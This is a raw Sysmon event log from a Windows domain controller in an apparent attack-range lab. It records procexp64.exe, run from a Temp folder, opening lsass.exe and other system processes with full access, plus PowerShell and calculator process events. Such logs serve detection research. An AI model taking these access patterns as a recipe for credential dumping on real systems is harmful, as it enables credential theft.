15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.704{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000791596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.407{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_n4l0awmo.r3m.ps12021-01-26 15:16:56.407 10341000x8000000000000000791595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:56.360{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.891{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.891{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-1600-00000000A301}15285192C:\Windows\system32\svchost.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3269-6010-E7A2-00000000A301}7444C:\Windows\System32\win32calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-3269-6010-E6A2-00000000A301}10843796C:\Windows\System32\calc.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+8db63|C:\Windows\System32\SHELL32.dll+8da2b|C:\Windows\System32\SHELL32.dll+8d347|C:\Windows\System32\SHELL32.dll+6b47e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x8000000000000000791953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.873{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe10.0.14393.0 (rs1_release.160715-1616)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationWIN32CALC.EXE"C:\Windows\System32\win32calc.exe" C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=B31A19BA38F110838119299B50517073,SHA256=D7B378A4BC4DEAE748462D216D14A20CCB1BAC1D3FFBC67711DB2CC1D8B182B7,IMPHASH=83A6FF176255FE0F3F902360860DA5F8{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe"C:\Windows\System32\calc.exe" 10341000x8000000000000000791952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-1518-600B-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791951Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.860{732C744F-1518-600B-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{732C744F-3269-6010-E6A2-00000000A301}1084C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791950Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791949Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 